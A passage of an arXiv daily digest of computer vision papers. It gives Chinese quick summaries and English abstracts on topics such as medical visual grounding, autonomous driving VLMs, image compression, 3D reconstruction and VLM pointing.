this https URL.
[CV-71] MedLoc-R1: Performance-Aware Curriculum Reward Scheduling for GRPO-Based Medical Visual Grounding CVPR
【速读】:该论文旨在解决生成式 AI (Generative AI) 在医学视觉定位(Medical Visual Grounding)任务中,因奖励稀疏性导致策略梯度消失和训练停滞的问题。现有基于强化学习(Reinforcement Learning, RL)的方法如 Group Relative Policy Optimization (GRPO) 在处理医学图像时,由于目标区域小或模糊,加之固定 IoU(Intersection over Union)奖励机制刚性且不适应模型进展,难以有效优化。其解决方案的关键在于提出 MedLoc-R1——一个性能感知的奖励调度框架,通过滑动窗口性能追踪器与多条件更新规则,动态调整奖励标准:从初期宽松、易获取的密集奖励信号逐步过渡到后期严格的细粒度定位要求,从而在不引入额外网络或梯度路径的前提下,显著提升定位精度与训练稳定性。
链接: https://arxiv.org/abs/2603.28120
作者: Guangjing Yang,Ziyuan Qin,Chaoran Zhang,Chenlin Du,Jinlin Wang,Wanran Sun,Zhenyu Zhang,Bing Ji,Qicheng Lao
机构: Beijing University of Posts and Telecommunications (北京邮电大学); Emory University (埃默里大学); Peking University (北京大学); Shandong University (山东大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 2026 IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)
Abstract:Medical visual grounding serves as a crucial foundation for fine-grained multimodal reasoning and interpretable clinical decision support. Despite recent advances in reinforcement learning (RL) for grounding tasks, existing approaches such as Group Relative Policy Optimization (GRPO) suffer from severe reward sparsity when directly applied to medical images, primarily due to the inherent difficulty of localizing small or ambiguous regions of interest, which is further exacerbated by the rigid and suboptimal nature of fixed IoU-based reward schemes in RL. This leads to vanishing policy gradients and stagnated optimization, particularly during early training. To address this challenge, we propose MedLoc-R1, a performance-aware reward scheduling framework that progressively tightens the reward criterion in accordance with model readiness. MedLoc-R1 introduces a sliding-window performance tracker and a multi-condition update rule that automatically adjust the reward schedule from dense, easily obtainable signals to stricter, fine-grained localization requirements, while preserving the favorable properties of GRPO without introducing auxiliary networks or additional gradient paths. Experiments on three medical visual grounding benchmarks demonstrate that MedLoc-R1 consistently improves both localization accuracy and training stability over GRPO-based baselines. Our framework offers a general, lightweight, and effective solution for RL-based grounding in high-stakes medical applications. Code & checkpoints are available at this https URL.
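The sliding-window tracker with a multi-condition update rule can be sketched as a small scheduler that tightens the IoU reward threshold once recent success is high enough. Window size, thresholds, step size, and promotion rate below are illustrative assumptions, not the paper's values.

```python
from collections import deque

class RewardScheduler:
    """Performance-aware reward scheduling sketch: track recent
    localization success in a sliding window; when the policy is
    'ready', tighten the IoU criterion one step."""
    def __init__(self, window=100, start_iou=0.1, max_iou=0.7,
                 step=0.1, promote_rate=0.6):
        self.history = deque(maxlen=window)
        self.iou_thresh = start_iou
        self.max_iou, self.step, self.promote_rate = max_iou, step, promote_rate

    def reward(self, iou):
        hit = iou >= self.iou_thresh
        self.history.append(hit)
        # Multi-condition update: window full AND success rate high enough
        # AND criterion not yet at its strictest setting.
        if (len(self.history) == self.history.maxlen
                and sum(self.history) / len(self.history) >= self.promote_rate
                and self.iou_thresh < self.max_iou):
            self.iou_thresh = min(self.iou_thresh + self.step, self.max_iou)
            self.history.clear()
        return 1.0 if hit else 0.0

sched = RewardScheduler(window=4)
for iou in [0.2, 0.3, 0.15, 0.4]:   # four successes at the loose 0.1 criterion
    sched.reward(iou)
print(round(sched.iou_thresh, 2))   # 0.2 -> criterion has been tightened
```

Because the rule only rewrites the reward signal, it leaves the GRPO update itself untouched, matching the abstract's claim of no auxiliary networks or extra gradient paths.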
[CV-72] AutoDrive-P³: Unified Chain of Perception-Prediction-Planning Thought via Reinforcement Fine-Tuning ICLR2026
【速读】:该论文旨在解决当前基于视觉-语言模型(Vision-Language Models, VLMs)的自动驾驶系统中存在的两大问题:一是部分VLM直接输出规划结果而缺乏链式思维(Chain-of-Thought, CoT)推理,跳过了感知与预测阶段,导致领域差距显著并削弱决策能力;二是另一些VLM虽能分别生成感知、预测和规划输出,但模块间采用碎片化决策方式,缺乏协同效应,难以实现真正高效的规划性能。解决方案的关键在于提出AutoDrive-P³框架,通过结构化推理将感知(Perception)、预测(Prediction)和规划(Planning)三者有机整合,并引入P³-CoT数据集以支持连贯推理,同时设计P³-GRPO算法——一种分层强化学习方法,在三个任务上提供渐进式监督,使模型逐步生成CoT推理路径,从而提升安全性与可解释性。此外,还引入双思考模式(详细思考与快速思考)以平衡效率与性能。
链接: https://arxiv.org/abs/2603.28116
作者: Yuqi Ye,Zijian Zhang,Junhong Lin,Shangkun Sun,Changhao Peng,Wei Gao
机构: Peking University (北京大学)
类目: Robotics (cs.RO); Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted at ICLR 2026 (International Conference on Learning Representations)
Abstract:Vision-language models (VLMs) are increasingly being adopted for end-to-end autonomous driving systems due to their exceptional performance in handling long-tail scenarios. However, current VLM-based approaches suffer from two major limitations: 1) Some VLMs directly output planning results without chain-of-thought (CoT) reasoning, bypassing crucial perception and prediction stages which creates a significant domain gap and compromises decision-making capability; 2) Other VLMs can generate outputs for perception, prediction, and planning tasks but employ a fragmented decision-making approach where these modules operate separately, leading to a significant lack of synergy that undermines true planning performance. To address these limitations, we propose AutoDrive-P³, a novel framework that seamlessly integrates Perception, Prediction, and Planning through structured reasoning. We introduce the P³-CoT dataset to facilitate coherent reasoning and propose P³-GRPO, a hierarchical reinforcement learning algorithm that provides progressive supervision across all three tasks. Specifically, AutoDrive-P³ progressively generates CoT reasoning and answers for perception, prediction, and planning, where perception provides essential information for subsequent prediction and planning, while both perception and prediction collectively contribute to the final planning decisions, enabling safer and more interpretable autonomous driving. Additionally, to balance inference efficiency with performance, we introduce dual thinking modes: detailed thinking and fast thinking. Extensive experiments on both open-loop (nuScenes) and closed-loop (NAVSIMv1/v2) benchmarks demonstrate that our approach achieves state-of-the-art performance in planning tasks. Code is available at this https URL.
[CV-73] Attention Frequency Modulation: Training-Free Spectral Modulation of Diffusion Cross-Attention
【速读】:该论文旨在解决文本条件潜在扩散模型中交叉注意力(cross-attention)的逐步多分辨率动态机制缺乏系统刻画的问题,从而限制了无需训练即可实现可控生成的能力。其核心解决方案是提出Attention Frequency Modulation (AFM),关键在于将交叉注意力建模为潜空间网格上的时空信号,通过汇总token-softmax权重生成与token无关的集中度图,并追踪去噪过程中径向分箱傅里叶功率的变化;在此基础上,AFM在推理阶段对预softmax交叉注意力logits进行傅里叶域编辑,利用与去噪进度对齐的低频和高频带重加权策略,并以token分配熵自适应地门控这些频率编辑,从而在不重新训练、不修改提示词或更新参数的前提下,连续调节token竞争模式的空间尺度,实现可靠的视觉编辑并保持语义一致性。
链接: https://arxiv.org/abs/2603.28114
作者: Seunghun Oh,Unsang Park
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 16 pages; preprint
Abstract:Cross-attention is the primary interface through which text conditions latent diffusion models, yet its step-wise multi-resolution dynamics remain under-characterized, limiting principled training-free control. We cast diffusion cross-attention as a spatiotemporal signal on the latent grid by summarizing token-softmax weights into token-agnostic concentration maps and tracking their radially binned Fourier power over denoising. Across prompts and seeds, encoder cross-attention exhibits a consistent coarse-to-fine spectral progression, yielding a stable time-frequency fingerprint of token competition. Building on this structure, we introduce Attention Frequency Modulation (AFM), a plug-and-play inference-time intervention that edits token-wise pre-softmax cross-attention logits in the Fourier domain: low- and high-frequency bands are reweighted with a progress-aligned schedule and can be adaptively gated by token-allocation entropy, before the token softmax. AFM provides a continuous handle to bias the spatial scale of token-competition patterns without retraining, prompt editing, or parameter updates. Experiments on Stable Diffusion show that AFM reliably redistributes attention spectra and produces substantial visual edits while largely preserving semantic alignment. Finally, we find that entropy mainly acts as an adaptive gain on the same frequency-based edit rather than an independent control axis.
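The spectral summary the paper builds on, radially binned Fourier power of a 2D attention concentration map, can be sketched in a few lines of NumPy. Grid size, bin count, and the test map are illustrative, not the paper's configuration.

```python
import numpy as np

def radial_fourier_power(attn_map, n_bins=8):
    """Radially binned Fourier power: FFT -> power spectrum ->
    average power per radial frequency band (bin 0 = lowest freq)."""
    h, w = attn_map.shape
    power = np.abs(np.fft.fftshift(np.fft.fft2(attn_map))) ** 2
    cy, cx = h // 2, w // 2
    yy, xx = np.indices((h, w))
    r = np.hypot(yy - cy, xx - cx)
    bins = np.minimum((r / (r.max() + 1e-9) * n_bins).astype(int), n_bins - 1)
    return np.array([power[bins == b].mean() for b in range(n_bins)])

# A smooth (coarse) concentration map puts its power in the lowest band,
# consistent with the coarse-to-fine progression described above.
x = np.linspace(-1, 1, 32)
smooth = np.exp(-(x[None, :] ** 2 + x[:, None] ** 2) * 4)
spec = radial_fourier_power(smooth)
print(spec.argmax())  # 0
```

Tracking this per-step spectrum over denoising yields the "time-frequency fingerprint"; AFM then reweights the corresponding low/high bands of the pre-softmax logits along the same schedule.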
[CV-74] Contour-Guided Query-Based Feature Fusion for Boundary-Aware and Generalizable Cardiac Ultrasound Segmentation
【速读】:该论文旨在解决心脏超声图像分割中因低对比度、斑点噪声、边界不规则及设备与人群间域偏移导致的边界精度不足和结构一致性差的问题:准确的心脏超声分割对智能医疗系统中的心室功能评估至关重要,但现有基于外观驱动的学习方法在上述条件下难以保持边界精度与结构一致性。其解决方案的关键在于提出一种轮廓引导查询精化网络(Contour-Guided Query Refinement Network, CGQR-Net),通过融合多分辨率特征表示与由轮廓提取的结构先验信息实现边界感知分割:首先利用HRNet骨干网络保留高分辨率空间细节并捕获多尺度上下文;随后生成粗略分割结果,从中提取解剖轮廓并编码为可学习的查询嵌入;这些轮廓引导的查询通过交叉注意力机制与融合特征图交互,实现结构感知的精化过程,从而提升边界刻画能力并抑制噪声伪影;此外,采用双头监督策略联合优化分割与边界预测,以强化结构一致性。
链接: https://arxiv.org/abs/2603.28110
作者: Zahid Ullah,Sieun Choi,Jihie Kim
机构: Dongguk University (东国大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Accurate cardiac ultrasound segmentation is essential for reliable assessment of ventricular function in intelligent healthcare systems. However, echocardiographic images are challenging due to low contrast, speckle noise, irregular boundaries, and domain shifts across devices and patient populations. Existing methods, largely based on appearance-driven learning, often fail to preserve boundary precision and structural consistency under these conditions. To address these issues, we propose a Contour-Guided Query Refinement Network (CGQR-Net) for boundary-aware cardiac ultrasound segmentation. The framework integrates multi-resolution feature representations with contour-derived structural priors. An HRNet backbone preserves high-resolution spatial details while capturing multi-scale context. A coarse segmentation is first generated, from which anatomical contours are extracted and encoded into learnable query embeddings. These contour-guided queries interact with fused feature maps via cross-attention, enabling structure-aware refinement that improves boundary delineation and reduces noise artifacts. A dual-head supervision strategy jointly optimizes segmentation and boundary prediction to enforce structural consistency. The proposed method is evaluated on the CAMUS dataset and further validated on the CardiacNet dataset to assess cross-dataset generalization. Experimental results demonstrate improved segmentation accuracy, enhanced boundary precision, and robust performance across varying imaging conditions. These results highlight the effectiveness of integrating contour-level structural information with feature-level representations for reliable cardiac ultrasound segmentation.
[CV-75] RAWIC: Bit-Depth Adaptive Lossless Raw Image Compression ICME2026
【速读】:该论文旨在解决原始图像(raw image)在存储与传输中面临的挑战,特别是针对不同相机传感器的位深度(bit depth)差异以及现有学习型无损压缩方法主要局限于8位sRGB图像的问题。传统无损压缩算法难以高效处理高动态范围、多比特深度的Bayer模式原始数据,而现有的重建方法则通常为有损且依赖特定相机假设。解决方案的关键在于提出RAWIC框架,其核心创新是将单通道Bayer数据转换为四通道RGGB格式并按块分割,通过计算每块的位深度作为辅助输入,设计了一个位深度自适应的熵模型,从而实现对来自多种相机设备和位深度的原始图像进行统一高效的无损压缩。该架构使单一模型具备跨设备泛化能力,并在实验中相较JPEG-XL平均降低7.7%码率。
链接: https://arxiv.org/abs/2603.28105
作者: Chunhang Zheng,Tongda Xu,Mingli Xie,Yan Wang,Dou Li
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by ICME 2026
Abstract:Raw images preserve linear sensor measurements and high bit-depth information crucial for advanced vision tasks and photography applications, yet their storage remains challenging due to large file sizes, varying bit depths, and sensor-dependent characteristics. Existing learned lossless compression methods mainly target 8-bit sRGB images, while raw reconstruction approaches are inherently lossy and rely on camera-specific assumptions. To address these challenges, we introduce RAWIC, a bit-depth-adaptive learned lossless compression framework for Bayer-pattern raw images. We first convert single-channel Bayer data into a four-channel RGGB format and partition it into patches. For each patch, we compute its bit depth and use it as auxiliary input to guide compression. A bit-depth-adaptive entropy model is then designed to estimate patch distributions conditioned on their bit depths. This architecture enables a single model to handle raw images from diverse cameras and bit depths. Experiments show that RAWIC consistently surpasses traditional lossless codecs, achieving an average 7.7% bitrate reduction over JPEG-XL. Our code is available at this https URL.
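RAWIC 的两步预处理——把单通道 Bayer 数据重排为四通道 RGGB,并按块计算位深度作为熵模型的辅助输入——可用如下示意代码理解(假设 RGGB 排列,位深度以块内最大值推算,仅为帮助理解的简化示例,非原文实现):

```python
import numpy as np

def bayer_to_rggb(raw):
    """把 H x W 的 RGGB Bayer 单通道图重排为 4 x H/2 x W/2 的四通道表示。"""
    return np.stack([raw[0::2, 0::2],   # R
                     raw[0::2, 1::2],   # G1
                     raw[1::2, 0::2],   # G2
                     raw[1::2, 1::2]])  # B

def patch_bit_depth(patch):
    """用块内最大像素值估计该块所需的位深度(示例性做法)。"""
    return max(1, int(patch.max()).bit_length())

raw = np.arange(16, dtype=np.uint16).reshape(4, 4)
rggb = bayer_to_rggb(raw)        # 形状 (4, 2, 2)
depth = patch_bit_depth(raw)     # 块内最大值 15 -> 4 bit
```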
[CV-76] Octree-based Learned Point Cloud Geometry Compression: A Lossy Perspective
【速读】:该论文旨在解决基于八叉树(octree)的点云压缩方法在有损压缩场景下的性能瓶颈问题。传统方法依赖于无损八叉树表示结合量化步长调整来实现有损压缩,但容易因量化导致大量点云数据丢失,从而引发严重失真。针对这一问题,论文提出两类关键解决方案:其一,对于物体类点云,设计了一种新的叶节点有损压缩方法,通过在叶节点上进行位级编码(bit-wise coding)和二值预测(binary prediction),实现高效有损压缩;其二,针对激光雷达(LiDAR)点云,提出一种简单而有效的率控制方法,支持可变比特率传输,并在无需微调的情况下实现约1%的比特误差率(bit error rate)。这两项创新显著提升了八叉树结构在有损压缩中的适用性和性能表现。
链接: https://arxiv.org/abs/2603.28095
作者: Kaiyu Zheng,Wei Gao,Huiming Zheng
机构: Peking University (北京大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Octree-based context learning has recently become a leading method in point cloud compression. However, its potential on lossy compression remains undiscovered. The traditional lossy compression paradigm using lossless octree representation with quantization step adjustment may result in severe distortions due to massive missing points in quantization. Therefore, we analyze data characteristics of different point clouds and propose lossy approaches specifically. For object point clouds that suffer from quantization step adjustment, we propose a new leaf nodes lossy compression method, which achieves lossy compression by performing bit-wise coding and binary prediction on leaf nodes. For LiDAR point clouds, we explore variable rate approaches and propose a simple but effective rate control method. Experimental results demonstrate that the proposed leaf nodes lossy compression method significantly outperforms the previous octree-based method on object point clouds, and the proposed rate control method achieves about 1% bit error without finetuning on LiDAR point clouds.
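摘要中对叶节点做"逐位编码"的基本思想可以这样示意:一个八叉树叶节点的 2×2×2 子体素占用状态可打包为一个 8 位整数(以下为假设性的简化实现,子节点顺序为示例约定,原文在此之上还做二值预测以压缩这些位):

```python
import numpy as np

def encode_leaf(occupancy):
    """occupancy: 形状 (2,2,2) 的 0/1 数组;按固定子节点顺序打包为一个 8 位整数。"""
    code = 0
    for i, b in enumerate(occupancy.reshape(-1).astype(int)):
        code |= int(b) << i
    return code

def decode_leaf(code):
    """从 8 位整数还原 2x2x2 占用状态。"""
    bits = [(code >> i) & 1 for i in range(8)]
    return np.array(bits).reshape(2, 2, 2)

occ = np.zeros((2, 2, 2), dtype=int)
occ[0, 0, 0] = 1     # 第一个子体素被占用 -> bit 0
occ[1, 1, 1] = 1     # 最后一个子体素被占用 -> bit 7
code = encode_leaf(occ)
```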
[CV-77] SHARP: Short-Window Streaming for Accurate and Robust Prediction in Motion Forecasting CVPR2026
【速读】:该论文旨在解决动态交通环境中运动预测模型在面对异构观测长度时性能下降的问题,尤其是在流式推理(streaming inference)场景下,传统方法难以保持跨不同观测时长的预测一致性。解决方案的关键在于提出一种新颖的流式运动预测框架,通过增量处理连续观测窗口,并引入实例感知的上下文流(instance-aware context streaming)机制来持续维护和更新智能体的潜在表示(latent agent representations),从而适应场景演化;同时设计双训练目标以确保在多种观测时长下均能实现一致的预测精度,最终在Argoverse 2等多智能体基准上实现了最先进性能且延迟极低,具备实际部署潜力。
链接: https://arxiv.org/abs/2603.28091
作者: Alexander Prutsch,Christian Fruhwirth-Reisinger,David Schinagl,Horst Possegger
机构: Graz University of Technology (格拉茨工业大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注: CVPR 2026. Project page at this https URL
Abstract:In dynamic traffic environments, motion forecasting models must be able to accurately estimate future trajectories continuously. Streaming-based methods are a promising solution, but despite recent advances, their performance often degrades when exposed to heterogeneous observation lengths. To address this, we propose a novel streaming-based motion forecasting framework that explicitly focuses on evolving scenes. Our method incrementally processes incoming observation windows and leverages an instance-aware context streaming to maintain and update latent agent representations across inference steps. A dual training objective further enables consistent forecasting accuracy across diverse observation horizons. Extensive experiments on Argoverse 2, nuScenes, and Argoverse 1 demonstrate the robustness of our approach under evolving scene conditions and also on the single-agent benchmarks. Our model achieves state-of-the-art performance in streaming inference on the Argoverse 2 multi-agent benchmark, while maintaining minimal latency, highlighting its suitability for real-world deployment.
[CV-78] To View Transform or Not to View Transform: NeRF-based Pre-training Perspective ICLR’26
【速读】:该论文旨在解决现有基于神经辐射场(NeRF)的预训练方法在自动驾驶3D感知任务中因与视图变换(view transformation)耦合而导致的先验冲突问题,即离散刚性表示与连续自适应函数假设之间的不一致,进而引发模糊且歧义的3D表征,限制了场景理解能力。此外,传统方法在下游任务中丢弃预训练的NeRF网络,造成对增强3D表征利用效率低下。解决方案的关键在于提出一种新型的NeRF-Resembled Point-based 3D检测器(NeRP3D),其通过学习连续的3D表示避免了视图变换带来的先验错配,并保留预训练的NeRF网络用于所有任务,从而在场景重建和目标检测任务中均展现出更强的性能潜力。
链接: https://arxiv.org/abs/2603.28090
作者: Hyeonjun Jeong,Juyeb Shin,Dongsuk Kum
机构: KAIST(韩国科学技术院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: The Fourteenth International Conference on Learning Representations (ICLR’26)
Abstract:Neural radiance fields (NeRFs) have emerged as a prominent pre-training paradigm for vision-centric autonomous driving, which enhances 3D geometry and appearance understanding in a fully self-supervised manner. To apply NeRF-based pretraining to 3D perception models, recent approaches have simply applied NeRFs to volumetric features obtained from view transformation. However, coupling NeRFs with view transformation inherits conflicting priors; view transformation imposes discrete and rigid representations, whereas radiance fields assume continuous and adaptive functions. When these opposing assumptions are forced into a single pipeline, the misalignment surfaces as blurry and ambiguous 3D representations that ultimately limit 3D scene understanding. Moreover, the NeRF network for pre-training is discarded during downstream tasks, resulting in inefficient utilization of enhanced 3D representations through NeRF. In this paper, we propose a novel NeRF-Resembled Point-based 3D detector that can learn continuous 3D representation and thus avoid the misaligned priors from view transformation. NeRP3D preserves the pre-trained NeRF network regardless of the tasks, inheriting the principle of continuous 3D representation learning and leading to greater potentials for both scene reconstruction and detection tasks. Experiments on nuScenes dataset demonstrate that our proposed approach significantly improves previous state-of-the-art methods, outperforming not only pretext scene reconstruction tasks but also downstream detection tasks.
[CV-79] GEMS: Agent-Native Multimodal Generation with Memory and Skills
【速读】:该论文旨在解决当前多模态生成模型在处理复杂指令和特定下游任务时表现不足的问题,尤其是在通用任务与专业场景之间存在能力鸿沟。其解决方案的关键在于提出GEMS(Agent-Native Multimodal Generation with Memory and Skills)框架,该框架通过三个核心组件实现突破:Agent Loop构建了基于多智能体的闭环优化机制以持续提升生成质量;Agent Memory提供分层持久化记忆结构,存储事实状态与压缩的经验摘要,从而增强全局优化视角并减少冗余;Agent Skill则引入可扩展的领域专用技能库,支持按需加载,使系统能够灵活应对多样化下游应用。实验证明,该框架在多个生成后端上均显著提升性能,甚至使轻量级6B模型超越现有SOTA模型。
链接: https://arxiv.org/abs/2603.28088
作者: Zefeng He,Siyuan Huang,Xiaoye Qu,Yafu Li,Tong Zhu,Yu Cheng,Yang Yang
机构: Shanghai AI Laboratory (上海人工智能实验室); Nanjing University (南京大学); Shanghai Jiao Tong University (上海交通大学); CUHK (香港中文大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Project Page: this https URL
Abstract:Recent multimodal generation models have achieved remarkable progress on general-purpose generation tasks, yet continue to struggle with complex instructions and specialized downstream tasks. Inspired by the success of advanced agent frameworks such as Claude Code, we propose GEMS (Agent-Native Multimodal GEneration with Memory and Skills), a framework that pushes beyond the inherent limitations of foundational models on both general and downstream tasks. GEMS is built upon three core components. Agent Loop introduces a structured multi-agent framework that iteratively improves generation quality through closed-loop optimization. Agent Memory provides a persistent, trajectory-level memory that hierarchically stores both factual states and compressed experiential summaries, enabling a global view of the optimization process while reducing redundancy. Agent Skill offers an extensible collection of domain-specific expertise with on-demand loading, allowing the system to effectively handle diverse downstream applications. Across five mainstream tasks and four downstream tasks, evaluated on multiple generative backends, GEMS consistently achieves significant performance gains. Most notably, it enables the lightweight 6B model Z-Image-Turbo to surpass the state-of-the-art Nano Banana 2 on GenEval2, demonstrating the effectiveness of agent harness in extending model capabilities beyond their original limits.
[CV-80] MolmoPoint: Better Pointing for VLMs with Grounding Tokens
【速读】:该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)在图像和视频指向(pointing)任务中依赖复杂坐标系统生成文本坐标而导致的高token消耗与低效率问题。现有方法通过输出坐标作为指针,不仅需要学习复杂的坐标映射关系,还因冗长的文本输出限制了模型性能与可扩展性。其解决方案的关键在于提出一种更直观的"视觉标记选择"机制:模型生成特殊的指向标记(pointing token),通过交叉注意力机制直接从输入图像或视频的视觉标记中选择包含目标概念的区域;进一步地,通过附加两个特殊标记实现细粒度定位:指向标记先选定粗粒度patch,第二个标记在该patch内选取更细的子patch,第三个标记再指定该子patch内部的具体位置。此外,采用顺序生成策略、编码前一位置的相对信息,并引入"无更多点"类别以提升一致性与准确性。该设计显著提升了图像、GUI界面及视频指向任务的性能,同时展现出更高的样本效率。
链接: https://arxiv.org/abs/2603.28069
作者: Christopher Clark,Yue Yang,Jae Sung Park,Zixian Ma,Jieyu Zhang,Rohun Tripathi,Mohammadreza Salehi,Sangho Lee,Taira Anderson,Winson Han,Ranjay Krishna
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Grounding has become a fundamental capability of vision-language models (VLMs). Most existing VLMs point by generating coordinates as part of their text output, which requires learning a complicated coordinate system and results in a high token count. Instead, we propose a more intuitive pointing mechanism that directly selects the visual tokens that contain the target concept. Our model generates a special pointing token that cross-attends to the input image or video tokens and selects the appropriate one. To make this model more fine-grained, we follow these pointing tokens with an additional special token that selects a fine-grained subpatch within the initially selected region, and then a third token that specifies a location within that subpatch. We further show that performance improves by generating points sequentially in a consistent order, encoding the relative position of the previously selected point, and including a special no-more-points class when selecting visual tokens. Using this method, we set a new state-of-the-art on image pointing (70.7% on PointBench), set a new state-of-the-art among fully open models on GUI pointing (61.1% on ScreenSpotPro), and improve video pointing (59.1% human preference win rate vs. a text coordinate baseline) and tracking (+6.3% gain on Molmo2Track). We additionally show that our method achieves much higher sample efficiency and discuss the qualitative differences that emerge from this design change.
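MolmoPoint「选视觉 token 而非生成文本坐标」的指向机制可用如下玩具代码示意(假设性简化:交叉注意力得分用点积模拟,token 取正交向量,patch 大小与子 patch 划分均为示例参数,非原文实现):

```python
import numpy as np

def select_patch(point_query, visual_tokens, grid_w):
    """指向 token 对所有视觉 token 做交叉注意力(此处简化为点积),
    选出得分最高的 patch,返回其网格坐标 (row, col)。"""
    scores = visual_tokens @ point_query
    idx = int(np.argmax(scores))
    return idx // grid_w, idx % grid_w

def refine_subpatch(row, col, sub_row, sub_col, patch_size=14, sub=2):
    """在选中的 patch 内取 sub x sub 子 patch 的中心像素坐标(示例性细化)。"""
    step = patch_size / sub
    y = row * patch_size + (sub_row + 0.5) * step
    x = col * patch_size + (sub_col + 0.5) * step
    return y, x

tokens = np.eye(16)                                 # 玩具设定:4x4 网格、16 个正交视觉 token
r, c = select_patch(tokens[9], tokens, grid_w=4)    # 选中索引 9 的 patch
y, x = refine_subpatch(r, c, sub_row=0, sub_col=1)  # 在该 patch 内细化到子 patch 中心
```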
[CV-81] AIBench: Evaluating Visual-Logical Consistency in Academic Illustration Generation
【速读】:该论文旨在解决当前生成式 AI (Generative AI) 在学术插图生成任务中缺乏系统性评估标准的问题,尤其是如何准确衡量生成插图在逻辑一致性与美学质量上的表现。其关键解决方案是提出 AIBench——首个结合视觉问答(VQA)与视觉语言模型(VLM)的基准测试框架:通过设计基于论文方法部分逻辑图的四级问题体系来量化评估插图与原文在不同粒度上的逻辑一致性,同时利用 VLM 评估插图的美学品质。该方法显著降低了对评判者 VLM 多模态理解能力的依赖,并揭示出当前模型在复杂推理与高密度内容生成能力上的显著差距,以及逻辑与美学难以协同优化的挑战。
链接: https://arxiv.org/abs/2603.28068
作者: Zhaohe Liao,Kaixun Jiang,Zhihang Liu,Yujie Wei,Junqiu Yu,Quanhao Li,Hong-Tao Yu,Pandeng Li,Yuzheng Wang,Zhen Xing,Shiwei Zhang,Chen-Wei Xie,Yun Zheng,Xihui Liu
机构: Tongyi Lab, Alibaba Group; SJTU; FDU; USTC; SEU; HKU
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Although image generation has boosted various applications via its rapid evolution, whether the state-of-the-art models are able to produce ready-to-use academic illustrations for papers is still largely unexplored. Directly comparing or evaluating the illustration with a VLM is naive but requires oracle multi-modal understanding ability, which is unreliable for long and complex texts and illustrations. To address this, we propose AIBench, the first benchmark using VQA for evaluating logic correctness of the academic illustrations and VLMs for assessing aesthetics. In detail, we designed four levels of questions proposed from a logic diagram summarized from the method part of the paper, which query whether the generated illustration aligns with the paper on different scales. Our VQA-based approach raises more accurate and detailed evaluations on visual-logical consistency while relying less on the ability of the judger VLM. With our high-quality AIBench, we conduct extensive experiments and conclude that the performance gap between models on this task is significantly larger than general ones, reflecting their various complex reasoning and high-density generation ability. Further, the logic and aesthetics are hard to optimize simultaneously as in handcrafted illustrations. Additional experiments further state that test-time scaling on both abilities significantly boosts the performance on this task.
[CV-82] 4DSurf: High-Fidelity Dynamic Scene Surface Reconstruction CVPR2026
【速读】:该论文旨在解决动态场景表面重建中因大尺度形变导致的时间不一致性问题,现有基于高斯泼溅(Gaussian Splatting, GS)的方法通常仅适用于单个物体或小变形场景,难以保持长时间序列下的几何一致性。其解决方案的关键在于提出一个统一的框架 4DSurf,核心创新是引入由高斯形变诱导的有符号距离函数流正则化(Gaussian Deformations Induced Signed Distance Function Flow Regularization),以约束高斯点的运动与表面演化对齐;同时设计重叠分段划分策略(Overlapping Segment Partitioning),将序列分割为具有小变形的重叠片段,并通过共享重叠时间帧实现几何信息的逐段传递,从而有效处理大形变并提升时序一致性。
链接: https://arxiv.org/abs/2603.28064
作者: Renjie Wu,Hongdong Li,Jose M. Alvarez,Miaomiao Liu
机构: Australian National University (澳大利亚国立大学); NVIDIA (英伟达); Amazon (亚马逊)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026
Abstract:This paper addresses the problem of dynamic scene surface reconstruction using Gaussian Splatting (GS), aiming to recover temporally consistent geometry. While existing GS-based dynamic surface reconstruction methods can yield superior reconstruction, they are typically limited to either a single object or objects with only small deformations, struggling to maintain temporally consistent surface reconstruction of large deformations over time. We propose “4DSurf”, a novel and unified framework for generic dynamic surface reconstruction that does not require specifying the number or types of objects in the scene, and can handle large surface deformations and temporal inconsistency in reconstruction. The key innovation of our framework is the introduction of Gaussian deformations induced Signed Distance Function Flow Regularization that constrains the motion of Gaussians to align with the evolving surface. To handle large deformations, we introduce an Overlapping Segment Partitioning strategy that divides the sequence into overlapping segments with small deformations and incrementally passes geometric information across segments through the shared overlapping timestep. Experiments on two challenging dynamic scene datasets, Hi4D and CMU Panoptic, demonstrate that our method outperforms state-of-the-art surface reconstruction methods by 49% and 19% in Chamfer distance, respectively, and achieves superior temporal consistency under sparse-view settings.
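4DSurf 的重叠分段划分策略(相邻片段共享一个时间帧,以便逐段传递几何信息)本身可以独立示意如下(假设性的最小实现,片段长度为示例参数):

```python
def overlapping_segments(num_frames, seg_len):
    """把 [0, num_frames) 划分为相邻片段共享一帧的重叠片段(示例实现):
    每个新片段从上一片段的最后一帧开始,该共享帧即几何信息的传递点。"""
    segments, start = [], 0
    while start < num_frames - 1:
        end = min(start + seg_len, num_frames)
        segments.append(list(range(start, end)))
        if end == num_frames:
            break
        start = end - 1          # 下一段从上一段最后一帧开始,形成共享帧
    return segments

segs = overlapping_segments(10, 4)
# 每相邻两段共享一帧,例如 [0,1,2,3] 与 [3,4,5,6]
```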
[CV-83] Object Detection Based on Distributed Convolutional Neural Networks
【速读】:该论文旨在解决基于深度学习的物体检测问题,特别是如何利用分布式卷积神经网络(DisCNN)实现高效且准确的目标检测。其解决方案的关键在于:利用DisCNN输出向量对特定正类别的特征具有正单调性(positive monotonicity)的性质,通过识别不同尺度下高分区域(patch),并将其重叠形成边界框来定位目标对象。该方法无需复杂的区域建议机制,仅需以目标为中心的图像数据进行训练,即可实现多类别并行检测和单类快速检测,得益于其轻量化模型结构显著提升检测效率。
链接: https://arxiv.org/abs/2603.28050
作者: Liang Sun
机构: Shandong University of Science and Technology (山东科技大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
